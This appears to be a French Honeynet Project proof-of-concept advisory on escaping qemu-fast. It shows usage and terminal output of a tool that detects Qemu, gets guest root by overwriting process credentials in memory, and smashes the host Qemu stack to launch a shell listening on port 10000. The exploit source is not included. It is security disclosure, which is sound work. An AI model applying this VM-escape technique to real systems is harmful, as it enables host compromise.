QEMU DETECTION AND EXPLOITATION By for the French Honeynet Project It is possible to break out of a Qemu jail! Do not use Qemu in 'fast' mode as a honeypot or as a jail to get an additional security layer. This PoC exploit works on qemu-fast, which uses the host MMU. Tested on qemu 0.6.0 (July 2004) with a guest Redhat 8 system. Important: although it works 10 times out of 10 on my test system, this is only a Proof of Concept intended to show the dangers of using Virtual Machines or Emulators to set up Honeypots. There is a huge way for improvement if you want to use it with reliability on other systems. ----- USAGE ----- $ ./q Fun with Qemu by for the FHP (qemu-fast only) Usage: ./q detect tell if we are running inside a Qemu system ./q root get root shell in the guest system ./q break break out of Qemu (execute code in the host system) --------- DETECTION --------- $ ./q detect Fun with Qemu by for the FHP (qemu-fast only) Very basic Qemu fingerprint: is the address 0xac000000 readable ? ** Qemu detected ! ** ------------------ GUEST ROOT EXPLOIT ------------------ $ ./q root Fun with Qemu by for the FHP (qemu-fast only) Trying to write to the guest kernel, by accessing the physical memory of the whole guest system. This will work only if it is located at address ac000000. Else, please modify the QEMU_PHYSMEM define in the source. Warning: might crash the guest system or loop forever. Found possible task struct at address 0xb1b9a12c. Now uid/euid = 500 / 500 Found possible task struct at address 0xb1c08028. Now uid/euid = 500 / 500 Found possible task struct at address 0xb1ca412c. Now uid/euid = 500 / 500 Found possible task struct at address 0xb1fae028. Now uid/euid = 500 / 500 Found possible task struct at address 0xb1fb412c. Now uid/euid = 0 / 0 sh-2.05b# -------------------- BREAKING OUT OF QEMU -------------------- $ ./q break Fun with Qemu by for the FHP (qemu-fast only) Looking for the address of our shellcode in physical memory... found at address 0xb1935580 Looking for the address of the qemu-fast executable code... found at address 0xa8000000 Now smashing the stack of the Qemu process in the host system. => here the assembly code in the 'shellcode' variable should have been launched on the *host* system, with the privileges of the qemu-fast process. In this PoC exploit, this code launches a shell listening on port 10000. [EOF]